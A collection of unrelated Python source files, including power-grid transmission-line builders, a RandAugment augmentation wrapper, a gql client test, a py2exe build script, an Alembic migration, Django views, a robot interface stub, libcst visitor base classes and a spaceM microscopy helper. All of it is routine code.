:return: (*pandas.DataFrame*) -- ac transmission line data frame
"""
acline = grid.branch[["from_bus_id", "to_bus_id", "rateA"]].reset_index()
acline["trans_length_km"] = list(
map(
haversine,
grid.bus.loc[acline["from_bus_id"], ["lat", "lon"]].values,
grid.bus.loc[acline["to_bus_id"], ["lat", "lon"]].values,
)
)
acline["trans_efficiency"] = list(
map(
branch_efficiency,
grid.bus.loc[acline["from_bus_id"], "baseKV"],
grid.bus.loc[acline["to_bus_id"], "baseKV"],
)
)
acline["branch_id"] = make_branch_indices(acline["branch_id"])
return acline.round(2)
def build_dclines(grid):
"""Create a data frame for dc transmission lines with required columns for
:func:`build_transmission_lines`.
:param powersimdata.input.grid.Grid grid: grid instance
:return: (*pandas.DataFrame*) -- dc transmission line data frame
"""
dcline = grid.dcline[["from_bus_id", "to_bus_id", "Pmax"]].reset_index()
dcline["trans_length_km"] = list(
map(
haversine,
grid.bus.loc[dcline["from_bus_id"], ["lat", "lon"]].values,
grid.bus.loc[dcline["to_bus_id"], ["lat", "lon"]].values,
)
)
dcline["trans_efficiency"] = 0.99
dcline["dcline_id"] = make_branch_indices(dcline["dcline_id"], dc=True)
dcline.rename(columns={"dcline_id": "branch_id", "Pmax": "rateA"}, inplace=True)
return dcline.round(2)
def build_transmission_lines(grid):
"""Parse branch and dcline data frames of a grid instance into a transmission
line data frame with new columns for length and efficiency.
:param powersimdata.input.grid.Grid grid: grid instance
:return: (*pandas.DataFrame*) -- transmission line data frame
"""
acline = build_aclines(grid)
dcline = build_dclines(grid)
transmission_line = pd.concat([dcline, acline], ignore_index=True)
transmission_line.rename(
columns={
"branch_id": "TRANSMISSION_LINE",
"from_bus_id": "trans_lz1",
"to_bus_id": "trans_lz2",
"rateA": "existing_trans_cap",
},
inplace=True,
)
transmission_line = transmission_line[
[
"TRANSMISSION_LINE",
"trans_lz1",
"trans_lz2",
"trans_length_km",
"trans_efficiency",
"existing_trans_cap",
]
]
return transmission_line
def build_trans_params():
"""Parse transmission parameters constants to a data frame.
:return: (*pandas.DataFrame*) -- single-row data frame with all params.
"""
return pd.DataFrame([const.transmission_parameters])
|
py | b415bb192e6231bc5c9a0897700b2c854b358c2a | # Copyright 2021 Adobe
# All Rights Reserved.
# NOTICE: Adobe permits you to use, modify, and distribute this file in
# accordance with the terms of the Adobe license agreement accompanying
# it.
'''
Randaugment
Cubuk, Ekin D., et al. "Randaugment: Practical automated data augmentation with a reduced search space." Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition Workshops. 2020.
The beacon_aug version is adapted from imgaug:
https://github.com/aleju/imgaug-doc/blob/7443efbf66263c0c44581ed62501fae6f88b047a/imgaug/augmenters/collections.py
Changes to above:
1) change all operators from imgaug to Beacon_aug (support all libraries)
2) result equivalent to calling A.Compose(...)
3) simplify the magnitudes similar to autoaug
e.g.
Create a RandAugment augmenter similar to the suggested hyperparameters in the paper.
.. code-block::
import Beacon_aug as BA
aug = BA.RandAugment(n=2, m=9)
Create a RandAugment augmenter for COCO dataset
.. code-block::
aug = BA.RandAugment(policy= "COCO")
'''
from numpy import lib
# import beacon_aug as BA
from .. import __init__ as BA
import albumentations as A
import cv2
import numpy as np
from imgaug import parameters as iap
from imgaug import random as iarandom
from imgaug.augmenters import meta
from imgaug.augmenters import arithmetic
from imgaug.augmenters import flip
from imgaug.augmenters import pillike
from imgaug.augmenters import size as sizelib
import random
class RandAugment:
"""Apply RandAugment to inputs as described in the corresponding paper.
See paper::
Cubuk et al.
RandAugment: Practical automated data augmentation with a reduced
search space
.. note::
The paper contains essentially no hyperparameters for the individual
augmentation techniques. The hyperparameters used here come mostly
from the official code repository, which however seems to only contain
code for CIFAR10 and SVHN, not for ImageNet. So some guesswork was
involved and a few of the hyperparameters were also taken from
https://github.com/ildoonet/pytorch-randaugment/blob/master/RandAugment/augmentations.py .
This implementation deviates from the code repository for all PIL
enhance operations. In the repository these use a factor of
``0.1 + M*1.8/M_max``, which would lead to a factor of ``0.1`` for the
weakest ``M`` of ``M=0``. For e.g. ``Brightness`` that would result in
a basically black image. This definition is fine for AutoAugment (from
where the code and hyperparameters are copied), which optimizes
each transformation's ``M`` individually, but not for RandAugment,
which uses a single fixed ``M``. We hence redefine these
hyperparameters to ``1.0 + S * M * 0.9/M_max``, where ``S`` is
randomly either ``1`` or ``-1``.
We also note that it is not entirely clear which transformations
were used in the ImageNet experiments. The paper lists some
transformations in Figure 2, but names others in the text too (e.g.
crops, flips, cutout). While Figure 2 lists the Identity function,
this transformation seems to not appear in the repository (and in fact,
the function ``randaugment(N, M)`` doesn't seem to exist in the
repository either). So we also make a best guess here about what
transformations might have been used.
.. warning::
This augmenter only works with image data, not e.g. bounding boxes.
The used PIL-based affine transformations are not yet able to
process non-image data. (This augmenter uses PIL-based affine
transformations to ensure that outputs are as similar as possible
to the paper's implementation.)
Added in 0.4.0.
**Supported dtypes**:
minimum of (
:class:`~imgaug.augmenters.flip.Fliplr`,
:class:`~imgaug.augmenters.size.KeepSizeByResize`,
:class:`~imgaug.augmenters.size.Crop`,
:class:`~imgaug.augmenters.meta.Sequential`,
:class:`~imgaug.augmenters.meta.SomeOf`,
:class:`~imgaug.augmenters.meta.Identity`,
:class:`~imgaug.augmenters.pillike.Autocontrast`,
:class:`~imgaug.augmenters.pillike.Equalize`,
:class:`~imgaug.augmenters.arithmetic.Invert`,
:class:`~imgaug.augmenters.pillike.Affine`,
:class:`~imgaug.augmenters.pillike.Posterize`,
:class:`~imgaug.augmenters.pillike.Solarize`,
:class:`~imgaug.augmenters.pillike.EnhanceColor`,
:class:`~imgaug.augmenters.pillike.EnhanceContrast`,
:class:`~imgaug.augmenters.pillike.EnhanceBrightness`,
:class:`~imgaug.augmenters.pillike.EnhanceSharpness`,
:class:`~imgaug.augmenters.arithmetic.Cutout`,
:class:`~imgaug.augmenters.pillike.FilterBlur`,
:class:`~imgaug.augmenters.pillike.FilterSmooth`
)
n : int or tuple of int or list of int or imgaug.parameters.StochasticParameter or None, optional
Parameter ``N`` in the paper, i.e. number of transformations to apply.
The paper suggests ``N=2`` for ImageNet.
See also parameter ``n`` in :class:`~imgaug.augmenters.meta.SomeOf`
for more details.
Note that horizontal flips (p=50%) and crops are always applied. This
parameter only determines how many of the other transformations
are applied per image.
m : int or tuple of int or list of int or imgaug.parameters.StochasticParameter or None, optional
Parameter ``M`` in the paper, i.e. magnitude/severity/strength of the
applied transformations in interval ``[0 .. 30]`` with ``M=0`` being
the weakest. The paper suggests for ImageNet ``M=9`` in case of
ResNet-50 and ``M=28`` in case of EfficientNet-B7.
This implementation uses a default value of ``(6, 12)``, i.e. the
value is uniformly sampled per image from the interval ``[6 .. 12]``.
This ensures greater diversity of transformations than using a single
fixed value.
* If ``int``: That value will always be used.
* If ``tuple`` ``(a, b)``: A random value will be uniformly sampled per
image from the discrete interval ``[a .. b]``.
* If ``list``: A random value will be picked from the list per image.
* If ``StochasticParameter``: For ``B`` images in a batch, ``B`` values
will be sampled per augmenter (provided the augmenter is dependent
on the magnitude).
cval : number or tuple of number or list of number or imgaug.ALL or imgaug.parameters.StochasticParameter, optional
The constant value to use when filling in newly created pixels.
See parameter `fillcolor` in
:class:`~imgaug.augmenters.pillike.Affine` for details.
The paper's repository uses an RGB value of ``125, 122, 113``.
This implementation uses a single intensity value of ``128``, which
should work better for cases where input images don't have exactly
``3`` channels or come from a different dataset than used by the
paper.
Examples
--------
>>> import imgaug.augmenters as iaa
>>> aug = iaa.RandAugment(n=2, m=9)
Create a RandAugment augmenter similar to the suggested hyperparameters
in the paper.
>>> aug = iaa.RandAugment(m=30)
Create a RandAugment augmenter with maximum magnitude/strength.
>>> aug = iaa.RandAugment(m=(0, 9))
Create a RandAugment augmenter that applies its transformations with a
random magnitude between ``0`` (very weak) and ``9`` (recommended for
ImageNet and ResNet-50). ``m`` is sampled per transformation.
>>> aug = iaa.RandAugment(n=(0, 3))
Create a RandAugment augmenter that applies ``0`` to ``3`` of its
child transformations to images. Horizontal flips (p=50%) and crops are
always applied.
"""
_M_MAX = 30
# according to paper:
# N=2, M=9 is optimal for ImageNet with ResNet-50
# N=2, M=28 is optimal for ImageNet with EfficientNet-B7
# for cval they use [125, 122, 113]
def __new__(cls, policy="imagenet-Resnet50", n=None, m=None, interpolation=cv2.INTER_NEAREST,
cval=0, library="imgaug", *args, **kwargs):
obj = super(RandAugment, cls).__new__(cls)
obj.__init__(policy, interpolation, cval, library, *args, **kwargs)
        if n is None or m is None:
            if policy.lower() == "imagenet-efficientnetb7":  # Paper Appendix A.2.3
# N=2, M=28 is optimal for ImageNet with EfficientNet-B7
n = 2
m = 28
elif policy.lower() == "cifar":
n = 3
m = 5
elif policy.lower() == "svhn":
n = 3
m = 5
elif policy.lower() == "coco":
n = 1
m = 5
else: # policy.lower() == "imagenet-Resnet50": # Paper Appendix A.2.3
# N=2, M=9 is optimal for ImageNet with ResNet-50
n = 2
m = 9
# The paper says in Appendix A.2.3 "ImageNet", that they actually
# always execute Horizontal Flips and Crops first and only then a
# random selection of the other transformations.
# Hence, we split here into two groups.
initial_augs = obj._create_initial_augmenters_list(m, interpolation, library)
main_augs = obj._create_main_augmenters_list(m, cval, interpolation, library)
# # assign random state to all child augmenters
# for lst in [initial_augs, main_augs]:
# for augmenter in lst:
# augmenter.random_state = rng
return A.Compose([A.Sequential(initial_augs),
A.SomeOf(transforms=main_augs, n=n)]
)
@classmethod # Added in 0.4.0.
def _create_initial_augmenters_list(cls, m, interpolation, library):
# It's not really clear what crop parameters they use, so we
# choose [0..M] here.
# Random crop image and resize to image size
return [
BA.HorizontalFlip(p=0.5, library=library),
            BA.KeepSizeCrop()
]
@classmethod # Added in 0.4.0.
def _create_main_augmenters_list(cls, m, cval, interpolation, library):
# pylint: disable=invalid-name
# In the paper's code they use the definition from AutoAugment,
# which is 0.1 + M*1.8/10. But that results in 0.1 for M=0, i.e. for
# Brightness an almost black image, while M=5 would result in an
# unaltered image. For AutoAugment that may be fine, as M is optimized
# for each operation individually, but here we have only one fixed M
# for all operations. Hence, we rather set this to 1.0 +/- M*0.9/10,
# so that M=10 would result in 0.1 or 1.9.
def _get_magnitudes(op_name, level, maxval=1):
'''
_BINS # number of intervals /level
'''
val = None
# name: (magnitudes, signed)
magnitudes_dict = {
"ShearX": (np.linspace(0.0, 0.3, level), True),
"ShearY": (np.linspace(0.0, 0.3, level), True),
"TranslateX": (np.linspace(0.0, 150.0 / 331.0, level), True),
"TranslateY": (np.linspace(0.0, 150.0 / 331.0, level), True),
"Rotate": (np.linspace(0.0, 30.0, level), True),
"Brightness": (np.linspace(0.0, 0.9, level), False),
"Color": (np.linspace(0.0, 0.9, level), False),
"Contrast": (np.linspace(0.0, 0.9, level), False),
"Sharpness": (np.linspace(0.0, 0.9, level), False),
"Posterize": (np.linspace(1, maxval, level), False),
"Solarize": (np.linspace(maxval, 0.0, level), False),
"Cutout": (np.linspace(0, 20 / 32, level), False),
"AutoContrast": (None, None),
"Equalize": (None, None),
"Invert": (None, None),
}
ele = magnitudes_dict[op_name]
if ele[1] == True:
magnitudes_list = ele[0].tolist()
sign = (-1) ** np.random.randint(2, size=1)[0] # -1 ,1
val = sign * random.choice(magnitudes_list)
elif ele[1] == False:
val = random.choice(ele[0])
if op_name in ["ShearX", "ShearY", "TranslateX", "TranslateY", "Posterize", "Solarize"]:
val = int(val)
return val
return [
# meta.Identity(),
BA.Autocontrast(p=1, library=library),
BA.Equalize(p=1, library=library),
BA.Invert(p=1, library=library),
# they use Image.rotate() for the rotation, which uses
# the image center as the rotation center
# BA.Rotate(p=1, library=library,
# limit=_get_magnitudes("Rotate", m)),
# paper uses 4 - int_parameter(M, 4)
BA.Posterize(p=1, library=library, num_bits=4 - _get_magnitudes("Posterize", m, 3)),
# paper uses 256 - int_parameter(M, 256)
BA.Solarize(p=1, library=library,
threshold=256 - _get_magnitudes("Solarize", m, 256)),
# pillike enhance
BA.EnhanceColor(factor=_get_magnitudes("Color", m), p=1, library=library),
BA.EnhanceContrast(factor=_get_magnitudes("Contrast", m), p=1, library=library),
BA.EnhanceBrightness(factor=_get_magnitudes("Brightness", m), p=1, library=library),
BA.EnhanceSharpness(factor=_get_magnitudes("Sharpness", m), p=1, library=library),
# ShearX
BA.Affine(p=1, interpolation=interpolation, cval=cval, library=library,
shear=[_get_magnitudes("ShearX", m), 0]),
# ShearY
BA.Affine(p=1, interpolation=interpolation, cval=cval, library=library,
shear=[0, _get_magnitudes("ShearY", m)]),
# TranslateX
BA.Affine(p=1, interpolation=interpolation, cval=cval, library=library,
translate_px=[_get_magnitudes("TranslateX", m), 0]),
# TranslateY
BA.Affine(p=1, interpolation=interpolation, cval=cval, library=library,
translate_px=[0, _get_magnitudes("TranslateY", m)]),
# paper code uses 20px on CIFAR (i.e. size 20/32), no information
# on ImageNet values so we just use the same values
BA.Cutout(p=1, library=library,
size=_get_magnitudes("Cutout", m),
squared=True,
fill_mode="constant",
cval=cval),
BA.FilterBlur(factor=_get_magnitudes("Sharpness", m), p=1, library=library),
BA.FilterSmooth(p=1, library=library),
]
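# --- Usage sketch (added for illustration; not part of the original file) ---
# Because __new__ returns an A.Compose pipeline (see the module docstring:
# "result equivalent to calling A.Compose(...)"), the object is applied like any
# other albumentations transform. The random image below is synthetic, and the
# image= keyword follows the albumentations call convention; whether every BA
# operator in the lists above accepts it is an assumption of this sketch.
if __name__ == "__main__":
    demo_image = np.random.randint(0, 256, (224, 224, 3), dtype=np.uint8)
    rand_aug = RandAugment(policy="imagenet-Resnet50", n=2, m=9)
    augmented = rand_aug(image=demo_image)["image"]
    print(augmented.shape, augmented.dtype)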
|
py | b415bb8a1b555334c99ba86310323297f040db7f | import pytest
import requests
import vcr
from gql import Client, gql
from gql.transport.requests import RequestsHTTPTransport
# https://github.com/graphql-python/swapi-graphene
URL = "http://127.0.0.1:8000/graphql"
@pytest.fixture
def client():
with vcr.use_cassette("tests/fixtures/vcr_cassettes/client.yaml"):
request = requests.get(
URL, headers={"Host": "swapi.graphene-python.org", "Accept": "text/html"}
)
request.raise_for_status()
csrf = request.cookies["csrftoken"]
return Client(
transport=RequestsHTTPTransport(
url=URL, cookies={"csrftoken": csrf}, headers={"x-csrftoken": csrf}
),
fetch_schema_from_transport=True,
)
def test_hero_name_query(client):
query = gql(
"""
{
myFavoriteFilm: film(id:"RmlsbToz") {
id
title
episodeId
characters(first:5) {
edges {
node {
name
}
}
}
}
}
"""
)
expected = {
"myFavoriteFilm": {
"id": "RmlsbToz",
"title": "Return of the Jedi",
"episodeId": 6,
"characters": {
"edges": [
{"node": {"name": "Luke Skywalker"}},
{"node": {"name": "C-3PO"}},
{"node": {"name": "R2-D2"}},
{"node": {"name": "Darth Vader"}},
{"node": {"name": "Leia Organa"}},
]
},
}
}
with vcr.use_cassette("tests/fixtures/vcr_cassettes/execute.yaml"):
result = client.execute(query)
assert result == expected
|
py | b415bb8f3db6c717890ce23bc2ba3603f4376f3f | import distutils.core, shutil, os, py2exe, subprocess, os, re, platform
def grepimports(dir):
    ''' grep imports from first line of python files in given folder '''
    imports = set()
IMPORT_ = 'import '
for f in os.listdir(dir):
p = os.path.join(dir, f)
if not p.endswith("py"): continue
        for line in open(p):
if line.startswith(IMPORT_):
for i in line[len(IMPORT_):].split(','):
imports.add(i.strip())
break
return list(imports)
# check revision
svnversion = 'XXX'
try:
svnversion = str(subprocess.check_output("svnversion")).strip()
except:
print("Failed to determine revision - is svnversion in path?")
pass
try:
svnversion = int(svnversion)
print("Source @ revision %s" % svnversion)
except:
svnversion = svnversion.replace(':', '-')
print("Source @ modified revision %s" % svnversion)
arch = platform.architecture()[0]
# clean up
shutil.rmtree(os.path.join("build", arch), True)
# calculate extra files
def make_data_files(roots):
data = []
for root in roots:
if os.path.isdir(root):
for dirpath, dirnames, filenames in os.walk(root, True, None, False):
if filenames:
data.append( (dirpath, [os.path.join(dirpath, f) for f in filenames if not '.pyc' in f]) )
if '__pycache__' in dirnames:
dirnames.remove('__pycache__')
if '.svn' in dirnames:
dirnames.remove('.svn')
else:
data.append( ('', [root]) )
return data
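# Example of the structure make_data_files() returns (illustrative values only):
#   make_data_files(['modules', 'simscript.ico'])
#   -> [('modules', ['modules/foo.py', 'modules/bar.py']),
#       ('', ['simscript.ico'])]
# One (target_dir, [files]) tuple per walked directory; top-level files are
# grouped under '' so distutils/py2exe places them next to the executable.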
dist = os.path.join("build", arch , "dist")
options = {
"dist_dir": dist,
"includes": grepimports('modules'),
"excludes" : [],
"dll_excludes": ["w9xpopen.exe"],
"packages": []
}
data_files = make_data_files(['contrib', 'modules', 'scripts', 'simscript.ico'])
simscript = {'script':'simscript.py', 'dest_base':'simscript', 'icon_resources':[(1,"simscript.ico")]}
tail = {'script':'tail.py'}
distutils.core.setup(console=[tail], windows=[simscript], options={'py2exe' :options}, data_files=data_files)
shutil.make_archive('build/simscript-%s-r%s' % (arch, svnversion), 'zip', dist, '.')
|
py | b415bb97f0cf3e0f5e499dd01f66df8818e10644 | """initial revision
Revision ID: e28d40a3770c
Revises: 69604d4ceebf
Create Date: 2020-09-15 11:18:51.141736
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "e28d40a3770c"
down_revision = "69604d4ceebf"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"app_1_base_user",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("email", sa.String(), nullable=False),
sa.Column("username", sa.String(), nullable=True),
sa.Column("hashed_password", sa.String(), nullable=False),
sa.Column("date_joined", sa.DateTime(), nullable=True),
sa.Column("first_name", sa.String(), nullable=True),
sa.Column("last_name", sa.String(), nullable=True),
sa.Column("is_staff", sa.Boolean(), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("email"),
sa.UniqueConstraint("username"),
)
op.create_table(
"app_1_book",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("title", sa.String(), nullable=True),
sa.Column("author", sa.String(), nullable=True),
sa.Column("publication_date", sa.DateTime(), nullable=False),
sa.Column(
"book_profile",
postgresql.JSONB(astext_type=sa.Text()),
server_default="{}",
nullable=False,
),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"app_1_custom_user",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("email", sa.String(), nullable=False),
sa.Column("username", sa.String(), nullable=True),
sa.Column("hashed_password", sa.String(), nullable=False),
sa.Column("date_joined", sa.DateTime(), nullable=True),
sa.Column("first_name", sa.String(), nullable=True),
sa.Column("last_name", sa.String(), nullable=True),
sa.Column("is_staff", sa.Boolean(), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("email"),
sa.UniqueConstraint("username"),
)
op.create_table(
"app_2_base_user",
sa.Column("sex", sa.String(), nullable=True),
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("email", sa.String(), nullable=False),
sa.Column("username", sa.String(), nullable=True),
sa.Column("hashed_password", sa.String(), nullable=False),
sa.Column("date_joined", sa.DateTime(), nullable=True),
sa.Column("first_name", sa.String(), nullable=True),
sa.Column("last_name", sa.String(), nullable=True),
sa.Column("is_staff", sa.Boolean(), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("email"),
sa.UniqueConstraint("username"),
)
op.create_table(
"auth_permission",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("name", sa.String(), nullable=False),
sa.Column("key", sa.String(), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("key"),
)
op.create_table(
"auth_role",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("name", sa.String(), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("name"),
)
op.create_table(
"app_1_comics",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("book", sa.Integer(), nullable=False),
sa.Column("artist", sa.String(), nullable=True),
sa.ForeignKeyConstraint(
["book"],
["app_1_book.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"auth_role_permission",
sa.Column("role", sa.Integer(), nullable=False),
sa.Column("permission", sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(
["permission"], ["auth_permission.id"], name="permission_fk"
),
sa.ForeignKeyConstraint(["role"], ["auth_role.id"], name="role_fk"),
sa.PrimaryKeyConstraint("role", "permission"),
)
op.create_table(
"auth_user_role",
sa.Column("user", sa.Integer(), nullable=False),
sa.Column("role", sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(
["role"],
["auth_role.id"],
),
sa.ForeignKeyConstraint(["role"], ["auth_role.id"], name="role_fk"),
sa.ForeignKeyConstraint(
["user"],
["app_1_base_user.id"],
),
sa.ForeignKeyConstraint(["user"], ["app_1_base_user.id"], name="user_fk"),
sa.PrimaryKeyConstraint("user", "role"),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("auth_user_role")
op.drop_table("auth_role_permission")
op.drop_table("app_1_comics")
op.drop_table("auth_role")
op.drop_table("auth_permission")
op.drop_table("app_2_base_user")
op.drop_table("app_1_custom_user")
op.drop_table("app_1_book")
op.drop_table("app_1_base_user")
# ### end Alembic commands ###
|
py | b415bbb504f0f28a3a828214150403473fbba381 | from django.utils.translation import ugettext_lazy as _
from ..accounts.models import UserProfile
from oauth2_provider.models import get_application_model
from django.views.generic.base import TemplateView
from django.shortcuts import redirect
from django.contrib.auth.mixins import LoginRequiredMixin
Application = get_application_model()
class HomeView(TemplateView):
template_name = "index.html"
def get(self, request, *args, **kwargs):
if request.user.is_authenticated:
return redirect('/home')
return super().get(request, *args, **kwargs)
class AuthenticatedHomeView(LoginRequiredMixin, TemplateView):
template_name = 'authenticated-home.html'
def get_context_data(self, **kwargs):
request = self.request
name = _('Authenticated Home')
try:
profile = UserProfile.objects.get(user=request.user)
except UserProfile.DoesNotExist:
profile = None
# this is a GET
context = {
'name': name,
'profile': profile,
'applications': Application.objects.filter(user=request.user),
}
return context
|
py | b415bc8c37a5069d7a9a2f6b90f16f0b6401e908 | import utilities as util
# modules for interfacing with robot control and FT sensor
# from robot_control_interface import ControlInterface
# from ft_sensor_interface import FTInterface
class RobotRealExample():
def __init__(self):
# Connect the interfaces
self.robot_interface = ControlInterface()
self.ft_interface = FTInterface()
@staticmethod
def decompose_incoming_pose_data(data):
position = data[:3]
rotation = data[3:7]
return [position, rotation]
def get_member_pose(self):
self.robot_interface.receive()
data_in = self.robot_interface.message_in.values
values = self.decompose_incoming_pose_data(data_in)
position_m = values[0]
rotation_quat = values[1]
return [position_m, rotation_quat]
@staticmethod
def get_target_pose():
# target at world origin
return [0, 0, 0], util.xyzw_by_euler([0, 0, 0], 'sxyz')
def get_force_torque(self):
self.ft_interface.receive()
data_in = self.ft_interface.message_in.values
force_torque = data_in
return force_torque
def apply_action_pose(self, delta, done):
relative_pos = delta[0:3]
relative_orn = delta[3:6]
data_out = list(relative_pos) + list(relative_orn) + [done]
self.robot_interface.send(data_out)
def apply_action_position(self, delta, done):
data_out = list(delta) + [0, 0, 0] + [done]
self.robot_interface.send(data_out)
|
py | b415bcadbc9f8dead58a5f9ee161559dc9782953 |
from django.urls import path,include
from . import views
urlpatterns = [
path('',views.home,name="home_page")
] |
py | b415bd13205b158cee6eb9320c518ce40a326667 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
from typing import TYPE_CHECKING, Union
from libcst._metadata_dependent import MetadataDependent
from libcst._removal_sentinel import RemovalSentinel
from libcst._typed_visitor import CSTTypedTransformerFunctions, CSTTypedVisitorFunctions
from libcst._types import CSTNodeT
if TYPE_CHECKING:
# Circular dependency for typing reasons only
from libcst._nodes.base import CSTNode # noqa: F401
CSTVisitorT = Union["CSTTransformer", "CSTVisitor"]
class CSTTransformer(CSTTypedTransformerFunctions, MetadataDependent):
"""
The low-level base visitor class for traversing a CST and creating an
updated copy of the original CST. This should be used in conjunction with
the :func:`~libcst.CSTNode.visit` method on a :class:`~libcst.CSTNode` to
visit each element in a tree starting with that node, and possibly returning
a new node in its place.
When visiting nodes using a :class:`CSTTransformer`, the return value of
:func:`~libcst.CSTNode.visit` will be a new tree with any changes made in
:func:`~libcst.CSTTransformer.on_leave` calls reflected in its children.
"""
def on_visit(self, node: "CSTNode") -> bool:
"""
Called every time a node is visited, before we've visited its children.
Returns ``True`` if children should be visited, and returns ``False``
otherwise.
"""
visit_func = getattr(self, f"visit_{type(node).__name__}", None)
if visit_func is not None:
retval = visit_func(node)
else:
retval = True
# Don't visit children IFF the visit function returned False.
return False if retval is False else True
def on_leave(
self, original_node: CSTNodeT, updated_node: CSTNodeT
) -> Union[CSTNodeT, RemovalSentinel]:
"""
Called every time we leave a node, after we've visited its children. If
the :func:`~libcst.CSTTransformer.on_visit` function for this node returns
``False``, this function will still be called on that node.
``original_node`` is guaranteed to be the same node as is passed to
:func:`~libcst.CSTTransformer.on_visit`, so it is safe to do state-based
checks using the ``is`` operator. Modifications should always be performed
on the ``updated_node`` so as to not overwrite changes made by child
visits.
Returning :attr:`RemovalSentinel.REMOVE` indicates that the node should be
removed from its parent. This is not always possible, and may raise an
exception if this node is required. As a convenience, you can use
:func:`RemoveFromParent` as an alias to :attr:`RemovalSentinel.REMOVE`.
"""
leave_func = getattr(self, f"leave_{type(original_node).__name__}", None)
if leave_func is not None:
updated_node = leave_func(original_node, updated_node)
return updated_node
def on_visit_attribute(self, node: "CSTNode", attribute: str) -> None:
"""
Called before a node's child attribute is visited and after we have called
:func:`~libcst.CSTTransformer.on_visit` on the node. A node's child
attributes are visited in the order that they appear in source that this
node originates from.
"""
visit_func = getattr(self, f"visit_{type(node).__name__}_{attribute}", None)
if visit_func is not None:
visit_func(node)
def on_leave_attribute(self, original_node: "CSTNode", attribute: str) -> None:
"""
Called after a node's child attribute is visited and before we have called
:func:`~libcst.CSTTransformer.on_leave` on the node.
Unlike :func:`~libcst.CSTTransformer.on_leave`, this function does
not allow modifications to the tree and is provided solely for state
management.
"""
leave_func = getattr(
self, f"leave_{type(original_node).__name__}_{attribute}", None
)
if leave_func is not None:
leave_func(original_node)
class CSTVisitor(CSTTypedVisitorFunctions, MetadataDependent):
"""
The low-level base visitor class for traversing a CST. This should be used in
conjunction with the :func:`~libcst.CSTNode.visit` method on a
:class:`~libcst.CSTNode` to visit each element in a tree starting with that
node. Unlike :class:`CSTTransformer`, instances of this class cannot modify
the tree.
When visiting nodes using a :class:`CSTVisitor`, the return value of
:func:`~libcst.CSTNode.visit` will equal the passed in tree.
"""
def on_visit(self, node: "CSTNode") -> bool:
"""
Called every time a node is visited, before we've visited its children.
Returns ``True`` if children should be visited, and returns ``False``
otherwise.
"""
visit_func = getattr(self, f"visit_{type(node).__name__}", None)
if visit_func is not None:
retval = visit_func(node)
else:
retval = True
# Don't visit children IFF the visit function returned False.
return False if retval is False else True
def on_leave(self, original_node: "CSTNode") -> None:
"""
Called every time we leave a node, after we've visited its children. If
the :func:`~libcst.CSTVisitor.on_visit` function for this node returns
``False``, this function will still be called on that node.
"""
leave_func = getattr(self, f"leave_{type(original_node).__name__}", None)
if leave_func is not None:
leave_func(original_node)
def on_visit_attribute(self, node: "CSTNode", attribute: str) -> None:
"""
Called before a node's child attribute is visited and after we have called
:func:`~libcst.CSTTransformer.on_visit` on the node. A node's child
attributes are visited in the order that they appear in source that this
node originates from.
"""
visit_func = getattr(self, f"visit_{type(node).__name__}_{attribute}", None)
if visit_func is not None:
visit_func(node)
def on_leave_attribute(self, original_node: "CSTNode", attribute: str) -> None:
"""
Called after a node's child attribute is visited and before we have called
:func:`~libcst.CSTVisitor.on_leave` on the node.
"""
leave_func = getattr(
self, f"leave_{type(original_node).__name__}_{attribute}", None
)
if leave_func is not None:
leave_func(original_node)
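# --- Usage sketch (added for illustration; not part of the original module) ---
# A minimal transformer written against the public libcst package, included only
# to make the visit/leave contract above concrete. It runs as a script, not on
# import, and assumes libcst is installed.
if __name__ == "__main__":
    import libcst as cst

    class _RenameFoo(cst.CSTTransformer):
        # on_leave dispatches to leave_<NodeName>; returning a new node replaces it
        def leave_Name(self, original_node, updated_node):
            if original_node.value == "foo":
                return updated_node.with_changes(value="bar")
            return updated_node

    module = cst.parse_module("foo = foo + 1\n")
    print(module.visit(_RenameFoo()).code)  # -> bar = bar + 1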
|
py | b415be027f780c0cec1b6b4dc3a0826d0d820680 | import spaceM
import pandas as pd
import os, gc
from subprocess import call
import GUI_maldi_helper
def getPath(field):
return pd.read_json(os.path.dirname(spaceM.__file__) + '\\paths.json')[field].values[0]
def curator(load_path, plot_title):
os.rename(load_path, load_path.split('.')[0] + '_old.' + load_path.split('.')[1])
call(['python', os.path.dirname(GUI_maldi_helper.__file__) + '\\MaldiHelper.py',
load_path.split('.')[0] + '_old.' + load_path.split('.')[1],
load_path,
plot_title])
def stitchMicroscopy(MF,
merge_colors,
merge_filenames,
tf,
preMALDI=True,
postMALDI=True,
):
"""Function to stitch tile microscopy images into a single one. The function first applies a transformation (tf) on
    each tile image prior to stitching. It also merges defined fields of stitched images together into an RGB .png
file.
Args:
MF (str): path to the Main Folder.
merge_colors (list): list of string of color names: 'red', 'green', 'blue', 'gray', 'cyan', 'magenta', 'yellow'.
        merge_filenames (list): list of string of image file names to merge. Their sequence in the list should match their
            respective color in the 'merge_colors' argument. After stitching they should start with 'img_t1_z1_c ... '.
tf (fun): image transformation to apply to the tile images prior to stitching.
        preMALDI (bool): whether or not to stitch the preMALDI dataset.
        postMALDI (bool): whether or not to stitch the postMALDI dataset.
Data are stored in MF + /Analysis/StitchedMicroscopy/
"""
if not os.path.exists(MF + 'Analysis/'):
